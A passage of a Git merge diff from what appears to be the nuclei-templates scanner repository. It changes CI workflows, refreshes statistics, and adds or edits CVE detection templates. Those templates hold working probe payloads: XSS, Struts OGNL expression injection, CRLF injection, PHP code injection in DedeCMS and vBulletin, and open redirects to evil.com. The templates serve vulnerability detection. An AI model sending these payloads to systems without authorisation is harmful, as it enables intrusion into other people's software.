Merge branch 'main' into dns-saas
commit
e3c79f9908
|
@ -15,12 +15,12 @@ jobs:
|
|||
- name: Get Github tag
|
||||
id: meta
|
||||
run: |
|
||||
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
|
||||
curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Setup CVE annotate
|
||||
if: steps.meta.outputs.tag != ''
|
||||
if: steps.meta.outputs.TAG != ''
|
||||
env:
|
||||
VERSION: ${{ steps.meta.outputs.tag }}
|
||||
VERSION: ${{ steps.meta.outputs.TAG }}
|
||||
run: |
|
||||
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip
|
||||
sudo unzip cve-annotate.zip -d /usr/local/bin
|
||||
|
@ -30,10 +30,10 @@ jobs:
|
|||
id: cve-annotate
|
||||
run: |
|
||||
cve-annotate -i . -d .
|
||||
echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.cve-annotate.outputs.changes > 0
|
||||
if: steps.cve-annotate.outputs.CHANGES > 0
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
|
@ -42,7 +42,7 @@ jobs:
|
|||
git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
if: steps.cve-annotate.outputs.changes > 0
|
||||
if: steps.cve-annotate.outputs.CHANGES > 0
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
|
|
|
@ -30,17 +30,17 @@ jobs:
|
|||
id: readme-update
|
||||
run: |
|
||||
python .github/scripts/update-readme.py
|
||||
echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.readme-update.outputs.changes > 0
|
||||
if: steps.readme-update.outputs.CHANGES > 0
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto README Update [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
if: steps.readme-update.outputs.changes > 0
|
||||
if: steps.readme-update.outputs.CHANGES > 0
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
|
|
|
@ -0,0 +1,38 @@
|
|||
name: 📝 Template Checksum
|
||||
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- '*'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- uses: actions/setup-go@v2
|
||||
with:
|
||||
go-version: 1.18
|
||||
|
||||
- name: install checksum generator
|
||||
run: |
|
||||
go install -v github.com/projectdiscovery/nuclei/v2/cmd/generate-checksum@dev
|
||||
|
||||
- name: generate checksum
|
||||
run: |
|
||||
generate-checksum /home/runner/work/nuclei-templates/nuclei-templates/ templates-checksum.txt
|
||||
|
||||
- name: Commit files
|
||||
run: |
|
||||
git pull
|
||||
git add templates-checksum.txt
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto Generated Templates Checksum [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: master
|
|
@ -14,7 +14,7 @@ jobs:
|
|||
with:
|
||||
go-version: 1.17
|
||||
|
||||
- name: Intalling Indexer
|
||||
- name: Installing Indexer
|
||||
run: |
|
||||
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
|
||||
git clone https://github.com/projectdiscovery/nucleish-api.git
|
||||
|
@ -26,4 +26,4 @@ jobs:
|
|||
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
|
||||
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
|
||||
run: |
|
||||
generate-index -mode templates
|
||||
generate-index -mode templates
|
||||
|
|
|
@ -11,12 +11,12 @@ jobs:
|
|||
- name: Get Github tag
|
||||
id: meta
|
||||
run: |
|
||||
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
|
||||
curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Setup Nuclei
|
||||
if: steps.meta.outputs.tag != ''
|
||||
if: steps.meta.outputs.TAG != ''
|
||||
env:
|
||||
VERSION: ${{ steps.meta.outputs.tag }}
|
||||
VERSION: ${{ steps.meta.outputs.TAG }}
|
||||
run: |
|
||||
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
|
||||
sudo unzip nuclei*.zip -d /usr/local/bin
|
||||
|
|
|
@ -13,7 +13,7 @@ jobs:
|
|||
- uses: actions/checkout@master
|
||||
- uses: actions/setup-go@v2
|
||||
with:
|
||||
go-version: 1.17
|
||||
go-version: 1.18
|
||||
|
||||
- name: Installing Template Stats
|
||||
run: |
|
||||
|
@ -37,10 +37,10 @@ jobs:
|
|||
|
||||
- name: Get statistical changes
|
||||
id: stats
|
||||
run: echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
run: git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.stats.outputs.changes > 0
|
||||
if: steps.stats.outputs.CHANGES > 0
|
||||
run: |
|
||||
git add TEMPLATES-STATS.*
|
||||
git add TOP-10.md
|
||||
|
|
|
@ -1,4 +1,10 @@
|
|||
network/cowrie-honeypot-detect.yaml
|
||||
network/ftp-default-credentials.yaml
|
||||
takeovers/feedpress-takeover.yaml
|
||||
takeovers/tictail-takeover.yaml
|
||||
cves/2022/CVE-2022-0786.yaml
|
||||
cves/2022/CVE-2022-25082.yaml
|
||||
exposed-panels/creatio-login-panel.yaml
|
||||
exposed-panels/posthog-admin-panel.yaml
|
||||
exposed-panels/webuzo-admin-panel.yaml
|
||||
exposed-panels/xfinity-panel.yaml
|
||||
iot/carel-plantvisor-panel.yaml
|
||||
iot/hue-personal-wireless-panel.yaml
|
||||
network/exposed-dockerd.yaml
|
||||
technologies/aws/amazon-ec2-detect.yaml
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1510 | dhiyaneshdk | 679 | cves | 1488 | info | 1604 | http | 4170 |
|
||||
| panel | 736 | daffainfo | 657 | exposed-panels | 741 | high | 1127 | file | 77 |
|
||||
| edb | 574 | pikpikcu | 340 | vulnerabilities | 517 | medium | 812 | network | 68 |
|
||||
| xss | 526 | pdteam | 274 | misconfiguration | 322 | critical | 534 | dns | 17 |
|
||||
| lfi | 518 | geeknik | 196 | technologies | 303 | low | 249 | | |
|
||||
| exposure | 505 | dwisiswant0 | 171 | exposures | 299 | unknown | 21 | | |
|
||||
| wordpress | 455 | 0x_akoko | 169 | token-spray | 235 | | | | |
|
||||
| cve2021 | 365 | ritikchaddha | 159 | workflows | 190 | | | | |
|
||||
| wp-plugin | 350 | pussycat0x | 155 | default-logins | 111 | | | | |
|
||||
| rce | 342 | princechaddha | 151 | file | 77 | | | | |
|
||||
| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 |
|
||||
| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 |
|
||||
| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 |
|
||||
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
|
||||
| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | |
|
||||
| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | |
|
||||
| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | |
|
||||
| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | |
|
||||
| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | |
|
||||
| tech | 360 | princechaddha | 153 | file | 78 | | | | |
|
||||
|
||||
**307 directories, 4566 files**.
|
||||
**328 directories, 4791 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
4442
TEMPLATES-STATS.md
4442
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1510 | dhiyaneshdk | 679 | cves | 1488 | info | 1604 | http | 4170 |
|
||||
| panel | 736 | daffainfo | 657 | exposed-panels | 741 | high | 1127 | file | 77 |
|
||||
| edb | 574 | pikpikcu | 340 | vulnerabilities | 517 | medium | 812 | network | 68 |
|
||||
| xss | 526 | pdteam | 274 | misconfiguration | 322 | critical | 534 | dns | 17 |
|
||||
| lfi | 518 | geeknik | 196 | technologies | 303 | low | 249 | | |
|
||||
| exposure | 505 | dwisiswant0 | 171 | exposures | 299 | unknown | 21 | | |
|
||||
| wordpress | 455 | 0x_akoko | 169 | token-spray | 235 | | | | |
|
||||
| cve2021 | 365 | ritikchaddha | 159 | workflows | 190 | | | | |
|
||||
| wp-plugin | 350 | pussycat0x | 155 | default-logins | 111 | | | | |
|
||||
| rce | 342 | princechaddha | 151 | file | 77 | | | | |
|
||||
| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 |
|
||||
| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 |
|
||||
| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 |
|
||||
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
|
||||
| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | |
|
||||
| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | |
|
||||
| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | |
|
||||
| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | |
|
||||
| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | |
|
||||
| tech | 360 | princechaddha | 153 | file | 78 | | | | |
|
||||
|
|
|
@ -1368,5 +1368,16 @@
|
|||
"website": "",
|
||||
"email": ""
|
||||
}
|
||||
},
|
||||
{
|
||||
"author": "heywoodlh",
|
||||
"links": {
|
||||
"github": "https://www.github.com/heywoodlh",
|
||||
"twitter": "",
|
||||
"linkedin": "",
|
||||
"website": "https://the-empire.systems",
|
||||
"email": ""
|
||||
}
|
||||
}
|
||||
|
||||
]
|
||||
|
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2008-6465
|
||||
|
||||
info:
|
||||
name: Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.
|
||||
reference:
|
||||
- http://www.xssing.com/index.php?x=3&y=65
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45254
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45252
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6465
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2008-6465
|
||||
cwe-id: CWE-80
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Parallels H-Sphere
|
||||
tags: cve,cve2008,xss,parallels,h-sphere
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '\" onfocus=alert(document.domain); autofocus'
|
||||
- 'Please enter login name & password'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
|
@ -13,10 +13,11 @@ info:
|
|||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2008-6982
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: devalcms,xss,cms,edb
|
||||
tags: cve,cve2008,devalcms,xss,cms,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2012-0394
|
||||
|
||||
info:
|
||||
name: Apache Struts Dev Mode OGNL Injection
|
||||
author: tess
|
||||
severity: critical
|
||||
description: |
|
||||
The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
|
||||
reference:
|
||||
- https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/
|
||||
- https://www.exploit-db.com/exploits/31434
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394
|
||||
- http://www.exploit-db.com/exploits/18329
|
||||
classification:
|
||||
cve-id: CVE-2012-0394
|
||||
metadata:
|
||||
shodan-query: html:"Struts Problem Report"
|
||||
verified: "true"
|
||||
tags: ognl,injection,edb,cve,cve2012,apache,struts
|
||||
|
||||
variables:
|
||||
first: "{{rand_int(1000, 9999)}}"
|
||||
second: "{{rand_int(1000, 9999)}}"
|
||||
result: "{{to_number(first)*to_number(second)}}"
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '{{result}}'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2016-10033
|
||||
|
||||
info:
|
||||
name: WordPress PHPMailer < 5.2.18 Remote Code Execution
|
||||
name: WordPress PHPMailer < 5.2.18 - Remote Code Execution
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport.
|
||||
|
|
|
@ -1,38 +1,42 @@
|
|||
id: CVE-2017-14186
|
||||
|
||||
info:
|
||||
name: FortiGate SSL VPN Web Portal - Cross Site Scripting
|
||||
author: johnk3r
|
||||
severity: medium
|
||||
description: |
|
||||
Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack.
|
||||
reference:
|
||||
- https://www.fortiguard.com/psirt/FG-IR-17-242
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-14186
|
||||
classification:
|
||||
cve-id: CVE-2017-14186
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: port:10443 http.favicon.hash:945408572
|
||||
tags: cve,cve2017,fortigate,xss,fortinet
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
id: CVE-2017-14186
|
||||
|
||||
info:
|
||||
name: FortiGate SSL VPN Web Portal - Cross Site Scripting
|
||||
author: johnk3r
|
||||
severity: medium
|
||||
description: |
|
||||
Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack.
|
||||
reference:
|
||||
- https://www.fortiguard.com/psirt/FG-IR-17-242
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-14186
|
||||
- https://fortiguard.com/advisory/FG-IR-17-242
|
||||
- https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2017-14186
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: port:10443 http.favicon.hash:945408572
|
||||
verified: "true"
|
||||
tags: cve,cve2017,fortigate,xss,fortinet
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -9,7 +9,7 @@ info:
|
|||
reference:
|
||||
- https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-8917
|
||||
- http://www.securitytracker.com/id/1038522
|
||||
- https://web.archive.org/web/20211207050608/http://www.securitytracker.com/id/1038522
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
|
@ -15,7 +15,7 @@ info:
|
|||
cvss-score: 9.8
|
||||
cve-id: CVE-2018-1000861
|
||||
cwe-id: CWE-502
|
||||
tags: kev,vulhub,cve,cve2018,jenkin,rce,jenkins
|
||||
tags: kev,vulhub,cve,cve2018,rce,jenkins
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2018-14912
|
||||
|
||||
info:
|
||||
name: cgit < 1.2.1 Directory Traversal
|
||||
name: cgit < 1.2.1 - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2018-17422
|
||||
|
||||
info:
|
||||
name: dotCMS <5.0.2 - Open Redirect
|
||||
name: DotCMS < 5.0.2 - Open Redirect
|
||||
author: 0x_Akoko,daffainfo
|
||||
severity: medium
|
||||
description: |
|
||||
|
@ -16,27 +16,22 @@ info:
|
|||
cve-id: CVE-2018-17422
|
||||
cwe-id: CWE-601
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"dotCMS"
|
||||
verified: "true"
|
||||
tags: cve,cve2018,redirect,dotcms
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh'
|
||||
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh'
|
||||
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com'
|
||||
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "self.location = 'http://www.interact.sh'"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- "self.location = 'http://evil.com'"
|
||||
- "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'"
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -19,7 +19,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}"
|
||||
- "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
@ -27,9 +27,7 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "phpinfo"
|
||||
- "PHP Version"
|
||||
condition: and
|
||||
- "4cc32a3a81d2bb37271934a48ce4468a"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-10232
|
||||
|
||||
info:
|
||||
name: Teclib GLPI <= 9.3.3 Unauthenticated SQL Injection
|
||||
name: Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection
|
||||
author: RedTeamBrasil
|
||||
severity: critical
|
||||
description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-12314
|
||||
|
||||
info:
|
||||
name: Deltek Maconomy 2.2.5 Local File Inclusion
|
||||
name: Deltek Maconomy 2.2.5 - Local File Inclusion
|
||||
author: madrobot
|
||||
severity: critical
|
||||
description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-12725
|
||||
|
||||
info:
|
||||
name: Zeroshell 3.9.0 Remote Command Execution
|
||||
name: Zeroshell 3.9.0 - Remote Command Execution
|
||||
author: dwisiswant0,akincibor
|
||||
severity: critical
|
||||
description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-13101
|
||||
|
||||
info:
|
||||
name: D-Link DIR-600M Authentication Bypass
|
||||
name: D-Link DIR-600M - Authentication Bypass
|
||||
author: Suman_Kar
|
||||
severity: critical
|
||||
description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-13392
|
||||
|
||||
info:
|
||||
name: MindPalette NateMail 3.0.15 Cross-Site Scripting
|
||||
name: MindPalette NateMail 3.0.15 - Cross-Site Scripting
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-15107
|
||||
|
||||
info:
|
||||
name: Webmin <= 1.920 Unauthenticated Remote Command Execution
|
||||
name: Webmin <= 1.920 - Unauthenticated Remote Command Execution
|
||||
author: bp0lr
|
||||
severity: critical
|
||||
description: Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-16313
|
||||
|
||||
info:
|
||||
name: ifw8 Router ROM v4.31 Credential Discovery
|
||||
name: ifw8 Router ROM v4.31 - Credential Discovery
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-16662
|
||||
|
||||
info:
|
||||
name: rConfig 3.9.2 Remote Code Execution
|
||||
name: rConfig 3.9.2 - Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.
|
||||
|
|
|
@ -15,7 +15,10 @@ info:
|
|||
cvss-score: 9.8
|
||||
cve-id: CVE-2019-16759
|
||||
cwe-id: CWE-94
|
||||
tags: rce,kev,seclists,cve,cve2019,vbulletin
|
||||
metadata:
|
||||
shodan-query: http.component:"vBulletin"
|
||||
verified: "true"
|
||||
tags: cve,cve2019,rce,kev,seclists,vbulletin
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -24,15 +27,15 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
|
||||
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "addcc9f9f2f40e2e6aca3079b73d9d17"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Version"
|
||||
|
||||
# Enhanced by mp on 2022/03/29
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2019-6802
|
||||
|
||||
info:
|
||||
name: Pypiserver 1.2.5 - CRLF Injection
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: |
|
||||
CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI
|
||||
reference:
|
||||
- https://vuldb.com/?id.130257
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-6802
|
||||
- https://github.com/pypiserver/pypiserver/issues/237
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-6802
|
||||
cwe-id: CWE-79,CWE-74
|
||||
metadata:
|
||||
shodan-query: html:"pypiserver"
|
||||
verified: "true"
|
||||
tags: cve,cve2019,crlf,generic,pypiserver
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'Set-Cookie: crlfinjection=1;'
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-10546
|
||||
|
||||
info:
|
||||
name: rConfig 3.9.4 SQL Injection
|
||||
name: rConfig 3.9.4 - SQL Injection
|
||||
author: madrobot
|
||||
severity: critical
|
||||
description: rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement,
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-10547
|
||||
|
||||
info:
|
||||
name: rConfig 3.9.4 SQL Injection
|
||||
name: rConfig 3.9.4 - SQL Injection
|
||||
author: madrobot
|
||||
severity: critical
|
||||
description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
|
||||
|
|
|
@ -7,9 +7,10 @@ info:
|
|||
description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
|
||||
reference:
|
||||
- https://web.archive.org/web/20210717142945/https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
|
||||
- https://github.com/grafana/grafana/blob/master/CHANGELOG.md
|
||||
- https://github.com/grafana/grafana/pull/23254
|
||||
